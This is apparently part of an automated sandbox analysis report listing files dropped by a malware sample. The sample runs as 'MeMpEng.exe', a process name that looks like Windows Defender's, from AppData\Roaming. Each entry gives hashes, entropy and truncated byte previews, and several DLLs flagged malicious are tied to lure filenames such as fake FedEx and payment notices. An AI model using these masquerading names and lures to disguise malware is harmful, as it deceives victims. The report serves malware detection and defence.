                                                        Preview:L...#..f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP...............r...D...JF.=;.C*..........4.......C:\Users\user\AppData\Local\Temp\RESA15F.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.x.t.o.l.s.l.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 05:01:45 2024, 1st section name ".debug$S"
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.9965476837711433
                                                        Encrypted:false
                                                        SSDEEP:24:H4e9Eur0DJ5dH0wKdNWI+ycuZhNSakSaPNnqSqd:FrWPbKd41ulSa3WqSK
                                                        MD5:C4E2D8CCB468A74CCC81530DE075C60E
                                                        SHA1:F7B08254F40598B45194D44CD9FC1E72DD8E6715
                                                        SHA-256:FAD0A5A7BD553D6E0C686969A3B977A57D6F9A106410FAB0666F985C45D0E5C8
                                                        SHA-512:858118265E62B4A154EFD334A18C2C8BD830B4202AF0E628027DA3DF200D3B92DC1E04D139EBCBCA32DC6FCB754D66BFFA862F93138998451D56FB9E7C7B8B11
                                                        Malicious:false
                                                        Preview:L...9..f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP................-|..U.q..,.@..F..........4.......C:\Users\user\AppData\Local\Temp\RESF3D2.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.x.n.x.d.p.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):385015
                                                        Entropy (8bit):1.253279247179919
                                                        Encrypted:false
                                                        SSDEEP:1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
                                                        MD5:84182132BEAC6B4CDD42AE3C3504778F
                                                        SHA1:9844B9B4ABEAC7B410809A582FE2E41BD38876A3
                                                        SHA-256:5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
                                                        SHA-512:054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
                                                        Malicious:false
                                                        Preview:....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):95102
                                                        Entropy (8bit):2.654806527567685
                                                        Encrypted:false
                                                        SSDEEP:768:hHw/BDNbFKnQy/ydtA9lEEEE0S26LFhZ5GX9s5LAMmyiBvEEEDRqLDEEEOpHWOyZ:P2SYqxAf2/VeRrEAyLyWEf2hrfEugM
                                                        MD5:F274C6543FBEDED2431765CBC9984E27
                                                        SHA1:943CB1A8D9A79BFD7CCA3161AB154E2174269ECC
                                                        SHA-256:AE46174718458C496D5098AC13BE9A4F0A9D52AED65B56E69D3FEA02848DFFD4
                                                        SHA-512:AC262930673FCCE797D118D5D82C9AD584F919A7CA0113B22F2107940826FEE9AD95060A50F59E285C1DE9CECD5CDB1524CDBBA36F9991DD46CB9DD1DD662E7E
                                                        Malicious:false
                                                        Preview:0000000000DCDC0000A1A100AE000009000000350056565600F20070004A003E00F600180027270000CCCCCC00007B000000090000D0D0D000003030300000000000460000A9A9A9A9A9A9A9000000C5C5C5008F00000000BB0000B200000000750000ED005D0000EBEB00EDEDEDED0000000000080800008888003F00000000B30000BA00D000D1D1008989000000000000000000220000000000E800000000000000878700727272005050500000000066666600009000B600000000001800EBEBEBEBEB00ED00004200FEFEFE0000FE00002E2E2E2E0014140000E6E6E6E6E6E6E6E6E6000000CCCCCC0000A500D000000000004E4E000000006A6A0094001C1C0000B1B100000000005F5F00710000BE00E200007A000000EC000000ADADAD0000000035353500B000003C3C3C00000000005400AA0095000086000C0000E7E7000000C000DDDDDDDDDDDDDDDD0000002B007A00000000000B0B0B00F7F7F7F70002020200F3000000BF00005F5F00002F2F00888888000000000000B6B6003C0000000000D6D6D600FAFAFA003939001800B7000000001111110000DE00000000EEEEEEEE00B90024000000004200000000E8E800000049002C2C2C2C00000000000000D0D0D0006F001F00007E7E0000BD0000001700004A00004F00C900DDDDDD00E900F7000000000049490000000021
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):296937
                                                        Entropy (8bit):7.6019275829075745
                                                        Encrypted:false
                                                        SSDEEP:6144:a/Bzk+nFVhuoPyvbsThdFGLtad5F8fx70nf:wVtuoq4vFilx70f
                                                        MD5:664B5789402965DA333A4B55DDE167EA
                                                        SHA1:4652F36A5B47211A90ACA2B3EACAB25A3B43BBEB
                                                        SHA-256:599DC10250FA371672C16807E351E5F2A1F4BFC54371AF2E63863C1C1CF8F56F
                                                        SHA-512:51217CDEB9BEE2D0EAB2A1242E7E01FC9A7822BCA34278E2420988BBB54F1C8C668A9AF0520FE11248D4F9EFC00A4C94D91B6EEBF4D47CE1448371CEDCC9C815
                                                        Malicious:false
                                                        Preview:..---.a..............qq....n.............ZZZ...b...].....oo.......f..bbbbb........................((..............[..0...........XX...............................(((...................&.d......\.!!..((((((................[..77.XXXX...,,................ppp..........nnn.....".888........g..............((...........................||......1._...........ww....................@@....66....eeeee......uuuuu...W........................................p.k...................... .....~~~....ee.............r.u...........qq........222.............................CCCCC........--..........j..`.].........OOO.xx................................w.AAAA.II.-----..,.[[.....................[.........x.==.....K...aaa..d..f...Q..........................gggg....................00.............................................i......................:.r....~...............W....y...............HHHH..E..........I.....hhh..................a.........................^^.................^^.........................:::...
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:ASCII text, with very long lines (304), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):304
                                                        Entropy (8bit):4.14301130689188
                                                        Encrypted:false
                                                        SSDEEP:6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
                                                        MD5:EF6FDEDE5EA8DBEF391FEC35BE82A5FC
                                                        SHA1:6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
                                                        SHA-256:37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
                                                        SHA-512:5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
                                                        Malicious:false
                                                        Preview:skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):269664
                                                        Entropy (8bit):1.2446463566225683
                                                        Encrypted:false
                                                        SSDEEP:768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
                                                        MD5:084CDF1FE8920EACBC8DC0E839D9E5A7
                                                        SHA1:5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
                                                        SHA-256:A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
                                                        SHA-512:F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
                                                        Malicious:false
                                                        Preview:...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............|................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):131403
                                                        Entropy (8bit):1.2526174536345023
                                                        Encrypted:false
                                                        SSDEEP:768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
                                                        MD5:9AD6681DD2B309E6ACE142096F9E2870
                                                        SHA1:5E02434342A98589A29B7E389E88DD4C60F09A8A
                                                        SHA-256:576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
                                                        SHA-512:28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
                                                        Malicious:false
                                                        Preview:.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):407199
                                                        Entropy (8bit):1.2437541055056829
                                                        Encrypted:false
                                                        SSDEEP:1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
                                                        MD5:D2D56C0A1BC3F0AE364C30A638393597
                                                        SHA1:B564662188D504D42B22E18A487BF35503B87AF5
                                                        SHA-256:E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
                                                        SHA-512:2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
                                                        Malicious:false
                                                        Preview:..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):186880
                                                        Entropy (8bit):1.2601075629320995
                                                        Encrypted:false
                                                        SSDEEP:768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
                                                        MD5:AA2CD52ABEA96B7E317691ADD713125D
                                                        SHA1:B34046DE9D9A275896762FD53A2DFF2D382EAE56
                                                        SHA-256:C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
                                                        SHA-512:AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
                                                        Malicious:false
                                                        Preview:..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5632
                                                        Entropy (8bit):3.817430038996001
                                                        Encrypted:false
                                                        SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                        MD5:549EE11198143574F4D9953198A09FE8
                                                        SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                        SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                        SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):5.804946284177748
                                                        Encrypted:false
                                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                                        • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                                        • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                                        • Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse
                                                        • Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse
                                                        • Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):3.3415738744933092
                                                        Encrypted:false
                                                        SSDEEP:48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
                                                        MD5:F8B6DD1F9620BE4EF2AD1E81FB6B79FA
                                                        SHA1:F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
                                                        SHA-256:A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
                                                        SHA-512:F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):9728
                                                        Entropy (8bit):5.157714967617029
                                                        Encrypted:false
                                                        SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                        MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                        SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                        SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                        SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):7168
                                                        Entropy (8bit):5.295306975422517
                                                        Encrypted:false
                                                        SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                        MD5:11092C1D3FBB449A60695C44F9F3D183
                                                        SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                        SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                        SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5632
                                                        Entropy (8bit):3.817430038996001
                                                        Encrypted:false
                                                        SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                        MD5:549EE11198143574F4D9953198A09FE8
                                                        SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                        SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                        SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):5.804946284177748
                                                        Encrypted:false
                                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):3.3415738744933092
                                                        Encrypted:false
                                                        SSDEEP:48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
                                                        MD5:F8B6DD1F9620BE4EF2AD1E81FB6B79FA
                                                        SHA1:F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
                                                        SHA-256:A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
                                                        SHA-512:F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):9728
                                                        Entropy (8bit):5.157714967617029
                                                        Encrypted:false
                                                        SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                        MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                        SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                        SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                        SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):7168
                                                        Entropy (8bit):5.295306975422517
                                                        Encrypted:false
                                                        SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                        MD5:11092C1D3FBB449A60695C44F9F3D183
